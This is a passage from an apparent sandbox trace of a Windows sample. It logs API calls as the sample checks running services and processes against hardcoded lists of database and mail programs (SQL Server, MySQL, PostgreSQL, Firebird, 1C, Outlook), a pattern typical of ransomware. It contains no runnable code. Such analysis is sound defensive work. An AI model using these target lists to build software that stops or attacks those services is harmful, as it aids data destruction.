(lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0048.228] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0048.228] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0048.228] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0048.228] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0048.228] lstrlenW (lpString="swprv") returned 5 [0048.228] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0048.228] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0048.228] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0048.228] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0048.228] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0048.228] lstrlenW (lpString="SysMain") returned 7 [0048.228] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0048.228] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0048.228] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0048.228] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0048.228] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0048.228] lstrlenW (lpString="Themes") returned 6 [0048.228] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0048.228] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0048.228] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0048.228] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0048.228] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0048.228] lstrlenW (lpString="TrkWks") returned 6 [0048.229] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0048.229] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0048.229] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0048.229] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0048.229] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0048.229] lstrlenW (lpString="UxSms") returned 5 [0048.229] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0048.229] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0048.229] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0048.229] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0048.229] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0048.229] lstrlenW (lpString="VSS") returned 3 [0048.229] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0048.229] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0048.229] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0048.229] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0048.229] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0048.229] lstrlenW (lpString="WdiServiceHost") returned 14 [0048.229] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0048.229] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0048.229] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0048.229] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0048.229] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0048.229] lstrlenW (lpString="WdiSystemHost") returned 13 [0048.229] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0048.229] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0048.229] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0048.229] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0048.229] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0048.229] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0048.229] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0048.229] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0048.229] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0048.230] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0048.230] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0048.230] lstrlenW (lpString="Winmgmt") returned 7 [0048.230] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0048.230] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0048.230] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0048.230] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0048.230] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0048.230] lstrlenW (lpString="WPDBusEnum") returned 10 [0048.230] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0048.230] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0048.230] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0048.230] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0048.230] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0048.230] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39606f0 | out: hHeap=0x570000) returned 1 [0048.230] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x220 [0048.232] Process32FirstW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0048.233] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0048.234] lstrlenW (lpString="System") returned 6 [0048.234] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0048.234] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0048.234] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0048.234] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0048.234] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0048.234] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0048.234] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0048.234] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0048.235] lstrlenW (lpString="smss.exe") returned 8 [0048.235] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0048.235] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0048.235] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0048.235] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0048.235] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0048.235] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0048.235] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0048.235] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0048.236] lstrlenW (lpString="csrss.exe") returned 9 [0048.236] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0048.236] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0048.236] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0048.236] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0048.236] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0048.236] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0048.236] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0048.236] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0048.237] lstrlenW (lpString="wininit.exe") returned 11 [0048.237] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0048.237] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0048.237] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0048.237] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0048.237] lstrlenW (lpString="csrss.exe") returned 9 [0048.238] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0048.238] lstrlenW (lpString="winlogon.exe") returned 12 [0048.238] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0048.239] lstrlenW (lpString="services.exe") returned 12 [0048.239] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0048.240] lstrlenW (lpString="lsass.exe") returned 9 [0048.240] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0048.240] lstrlenW (lpString="lsm.exe") returned 7 [0048.240] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.241] lstrlenW (lpString="svchost.exe") returned 11 [0048.241] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.242] lstrlenW (lpString="svchost.exe") returned 11 [0048.242] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.243] lstrlenW (lpString="svchost.exe") returned 11 [0048.243] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.243] lstrlenW (lpString="svchost.exe") returned 11 [0048.243] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.244] lstrlenW (lpString="svchost.exe") returned 11 [0048.244] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0048.245] lstrlenW (lpString="audiodg.exe") returned 11 [0048.245] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.246] lstrlenW (lpString="svchost.exe") returned 11 [0048.246] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.246] lstrlenW (lpString="svchost.exe") returned 11 [0048.246] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0048.247] lstrlenW (lpString="dwm.exe") returned 7 [0048.247] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0048.248] lstrlenW (lpString="explorer.exe") returned 12 [0048.248] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0048.248] lstrlenW (lpString="spoolsv.exe") returned 11 [0048.249] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0048.249] lstrlenW (lpString="taskhost.exe") returned 12 [0048.249] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.250] lstrlenW (lpString="svchost.exe") returned 11 [0048.250] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0048.251] lstrlenW (lpString="taskeng.exe") returned 11 [0048.251] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0048.251] lstrlenW (lpString="taskhost.exe") returned 12 [0048.251] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0048.252] lstrlenW (lpString="called.exe") returned 10 [0048.252] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0048.253] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0048.253] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0048.253] lstrlenW (lpString="analyst.exe") returned 11 [0048.253] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0048.254] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0048.254] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0048.582] lstrlenW (lpString="wages.exe") returned 9 [0048.582] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0048.583] lstrlenW (lpString="rand.exe") returned 8 [0048.583] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0048.583] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0048.583] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0048.584] lstrlenW (lpString="cottage.exe") returned 11 [0048.584] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0048.585] lstrlenW (lpString="pairs_spec.exe") returned 14 [0048.585] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0048.586] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0048.586] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0048.586] lstrlenW (lpString="observationshairy.exe") returned 21 [0048.587] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0048.587] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0048.587] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0048.588] lstrlenW (lpString="spectrum.exe") returned 12 [0048.588] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0048.589] lstrlenW (lpString="dies.exe") returned 8 [0048.589] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0048.589] lstrlenW (lpString="configured.exe") returned 14 [0048.589] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0048.590] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0048.590] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0048.591] lstrlenW (lpString="fast.exe") returned 8 [0048.591] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0048.591] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0048.591] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0048.592] lstrlenW (lpString="review.exe") returned 10 [0048.592] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0048.593] lstrlenW (lpString="historybinding.exe") returned 18 [0048.593] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0048.594] lstrlenW (lpString="pk task surge.exe") returned 17 [0048.594] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0048.594] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0048.594] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0048.595] lstrlenW (lpString="mobsync.exe") returned 11 [0048.595] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0048.596] lstrlenW (lpString="ivttvf.exe") returned 10 [0048.596] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0048.596] lstrlenW (lpString="cmd.exe") returned 7 [0048.596] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0048.597] lstrlenW (lpString="conhost.exe") returned 11 [0048.597] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, 